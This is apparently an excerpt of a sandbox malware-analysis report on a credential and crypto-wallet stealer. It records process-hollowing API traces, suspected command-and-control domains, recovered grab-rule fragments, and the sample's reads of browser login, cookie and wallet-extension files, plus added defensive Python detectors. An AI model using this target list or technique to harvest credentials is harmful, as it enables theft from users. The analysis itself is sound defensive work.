Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ED8D25 GetProcessHeap,0_2_00ED8D25
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECB290 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00ECB290
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECB64C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ECB64C
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECB640 SetUnhandledExceptionFilter,0_2_00ECB640

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EF21A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00EF21A9
Source: C:\Users\user\Desktop\8ZVMneG.exe | Memory written: C:\Users\user\Desktop\8ZVMneG.exe base: 400000 value starts with: 4D5A
Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: debonairnukk.xyz
Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: diffuculttan.xyz
Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: effecterectz.xyz
Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: deafeninggeh.biz
Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: immureprech.biz
Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bellflamre.click
Source: C:\Users\user\Desktop\8ZVMneG.exe | Process created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00EDC8FD
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetLocaleInfoW,0_2_00ED806C
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: EnumSystemLocalesW,0_2_00EDC862
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetLocaleInfoW,0_2_00EDCBAF
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: EnumSystemLocalesW,0_2_00EDCB50
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetLocaleInfoW,0_2_00EDCCCF
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: EnumSystemLocalesW,0_2_00EDCC84
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00EDCD76
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetLocaleInfoW,0_2_00EDCE7C
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00EDC611
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: EnumSystemLocalesW,0_2_00ED8610
Source: C:\Users\user\Desktop\8ZVMneG.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECC367 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00ECC367
Source: C:\Users\user\Desktop\8ZVMneG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 8ZVMneG.exe, 00000003.00000003.2440225330.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427807404.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427078648.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\8ZVMneG.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
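The API trace of 0_2_00EF21A9 together with the MZ header written to the child's base at 0x400000 is the classic process-hollowing sequence: create a process (the sample spawns a copy of itself), read the primary thread's context, allocate and write into the remote image, point the thread at the new entry with SetThreadContext, and resume. The Python below is an added example, not code from Joe Sandbox or from the sample; it parses copies of those two report entries and applies an ordering check. The mapping of API names to hollowing stages and the decision to make VirtualAllocEx and GetThreadContext optional are this example's own choices.

```python
"""Flag a process-hollowing API sequence in sandbox API-trace entries.

Added example; not code from Joe Sandbox or from the sample. The two
input lines are copies of entries in this report: the API trace of
function 0_2_00EF21A9 and the write of an MZ header into the child's
image base. The stage table below is this example's own mapping;
Nt*-level equivalents would be added for samples that resolve ntdll
exports directly.
"""
import re
from typing import Dict, List, Optional

TRACE_LINE = (
    r"Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EF21A9 "
    "GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,"
    "GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,"
    "VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,"
    "ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,"
    "GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,"
    "WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,"
    "Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00EF21A9"
)
WRITE_LINE = (
    r"Source: C:\Users\user\Desktop\8ZVMneG.exe | Memory written: "
    r"C:\Users\user\Desktop\8ZVMneG.exe base: 400000 value starts with: 4D5A"
)

API_TRACE_RE = re.compile(
    r"Code function:\s+(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<calls>[A-Za-z0-9_,]+)"
)
MEM_WRITE_RE = re.compile(
    r"Memory written:\s+(?P<target>.+?)\s+base:\s+(?P<base>[0-9A-Fa-f]+)"
    r"\s+value starts with:\s+(?P<magic>[0-9A-Fa-f]+)"
)

# Hollowing step -> API names that implement it (this example's mapping).
STAGES: Dict[str, set] = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "get_context": {"GetThreadContext", "Wow64GetThreadContext"},
    "alloc_remote": {"VirtualAllocEx"},
    "write_remote": {"WriteProcessMemory"},
    "set_context": {"SetThreadContext", "Wow64SetThreadContext"},
    "resume": {"ResumeThread"},
}
# Steps that must all occur, in this order. Context read and remote
# allocation are recorded but not required: a loader that allocates via
# NtAllocateVirtualMemory would not show VirtualAllocEx in the trace.
REQUIRED = ["create", "write_remote", "set_context", "resume"]


def parse_api_trace(line: str) -> List[str]:
    """Return the API names from a 'Code function: <id> a,b,c,<id>' entry."""
    m = API_TRACE_RE.search(line)
    if not m:
        return []
    fn = m.group("fn")
    return [c for c in m.group("calls").split(",") if c and c != fn]


def parse_memory_write(line: str) -> Optional[Dict[str, object]]:
    """Return target, base address and leading bytes of a 'Memory written' entry."""
    m = MEM_WRITE_RE.search(line)
    if not m:
        return None
    return {"target": m.group("target"), "base": int(m.group("base"), 16),
            "magic": m.group("magic").upper()}


def hollowing_stages(apis: List[str]) -> Dict[str, Optional[int]]:
    """Index of the first call satisfying each stage, or None if absent."""
    return {stage: next((i for i, a in enumerate(apis) if a in names), None)
            for stage, names in STAGES.items()}


def is_hollowing_sequence(apis: List[str]) -> bool:
    """True when every required stage is present and they occur in order."""
    positions = [hollowing_stages(apis)[s] for s in REQUIRED]
    if any(p is None for p in positions):
        return False
    return positions == sorted(positions)


def assess(lines: List[str]) -> Dict[str, object]:
    """Combine the API order with evidence that a PE header hit a remote image base."""
    apis: List[str] = []
    pe_writes = []
    for line in lines:
        apis.extend(parse_api_trace(line))
        w = parse_memory_write(line)
        if w and str(w["magic"]).startswith("4D5A"):   # 'MZ'
            pe_writes.append(w)
    return {
        "hollowing": is_hollowing_sequence(apis),
        "stages": hollowing_stages(apis),
        "pe_header_written": bool(pe_writes),
        "write_targets": sorted({str(w["target"]) for w in pe_writes}),
    }


if __name__ == "__main__":
    print(assess([TRACE_LINE, WRITE_LINE]))
```

The order check matters more than the presence of any single API: WriteProcessMemory and ResumeThread are common in legitimate debuggers and installers, but a write followed by SetThreadContext and ResumeThread on a process the same binary just created, with an MZ header landing at the image base, is rarely benign.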

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: 8ZVMneG.exe PID: 2144, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: 8ZVMneG.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: 8ZVMneG.exe, 00000003.00000003.2402901054.0000000001408000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: lets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t"$g
Source: 8ZVMneG.exe | String found in binary or memory: Jaxx Liberty
Source: 8ZVMneG.exe, 00000003.00000003.2402901054.0000000001408000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],
Source: 8ZVMneG.exe, 00000003.00000003.2402901054.0000000001408000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20
Source: 8ZVMneG.exe | String found in binary or memory: ExodusWeb3
Source: 8ZVMneG.exe, 00000003.00000002.2484637162.00000000013B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: 8ZVMneG.exe | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: 8ZVMneG.exe, 00000003.00000003.2423748589.0000000001414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
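The three memory strings above are fragments of the stealer's grab configuration: a JSON array of rules, each with a directory ("p"), file masks ("m") and the folder the files are filed under in the exfiltrated archive ("z"). Each fragment is cut off at both ends, so only rules whose object survives intact can be recovered. The Python below is an added example, not code from Joe Sandbox or from the sample; it pulls the intact rules out of copies of those fragments and expands %appdata% to the sandbox profile path so that the result can be matched against the resolved paths also seen in memory (for instance the Electrum-LTC wallets directory). Reading "fs" as a per-file size cap and "d" as a recursion depth is an assumption made here, not something the report states.

```python
"""Recover Lumma grab rules from truncated config fragments.

Added example; not code from Joe Sandbox or from the sample. The three
fragments below are copied from the memory strings in this report. Each
is cut off at both ends, so only JSON objects that survive intact are
parsed. "p" (directory), "m" (file masks) and "z" (archive folder) are
readable from the values; treating "fs" as a per-file size cap and "d"
as a recursion depth is an assumption made in this example.
"""
import json
import re
from typing import Dict, Iterable, List, Tuple

FRAGMENTS = [
    r'lets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t"$g',
    r'ple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],',
    r'um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20',
]

# Profile path of the sandbox user in this report; a real run would take
# the victim's environment instead.
SANDBOX_ENV = {"appdata": r"C:\Users\user\AppData\Roaming"}

# One complete rule object: every key present and the closing brace intact.
# Partial objects at either end of a fragment do not match.
RULE_RE = re.compile(
    r'\{"t":\d+,"p":"(?:[^"\\]|\\.)*","m":\[[^\]]*\],'
    r'"z":"(?:[^"\\]|\\.)*","d":\d+,"fs":\d+\}'
)


def extract_rules(fragments: Iterable[str]) -> List[Dict]:
    """Return intact rule objects in order of appearance, without duplicates.

    The same rule often appears in several memory dumps, so rules are keyed
    on (directory, masks, archive folder) to collapse repeats.
    """
    rules, seen = [], set()
    for frag in fragments:
        for m in RULE_RE.finditer(frag):
            rule = json.loads(m.group(0))
            key = (rule["p"], tuple(rule["m"]), rule["z"])
            if key not in seen:
                seen.add(key)
                rules.append(rule)
    return rules


def expand_path(path: str, env: Dict[str, str]) -> str:
    """Expand %var% placeholders from a caller-supplied map, case-insensitively."""
    return re.sub(r"%([^%]+)%",
                  lambda m: env.get(m.group(1).lower(), m.group(0)), path)


def targets(rules: List[Dict], env: Dict[str, str]) -> List[Tuple[str, Tuple[str, ...], str, int]]:
    """Flatten rules into (directory, masks, archive folder, size cap) tuples."""
    return [(expand_path(r["p"], env), tuple(r["m"]), r["z"], r["fs"]) for r in rules]


if __name__ == "__main__":
    for directory, masks, folder, cap in targets(extract_rules(FRAGMENTS), SANDBOX_ENV):
        print(f"{folder:28} {directory}  masks={masks}  cap={cap} bytes")
```

Four rules survive the truncation (Electrum-LTC, ElectronCash, the JAXX IndexedDB store and Exodus); the Binance, Electrum and Ledger Live rules are visible but incomplete and are deliberately not reconstructed. The expanded Electrum-LTC directory is exactly the resolved path the report lists as a memory string, which is how one confirms that the rule parser and the observed file activity agree.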
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
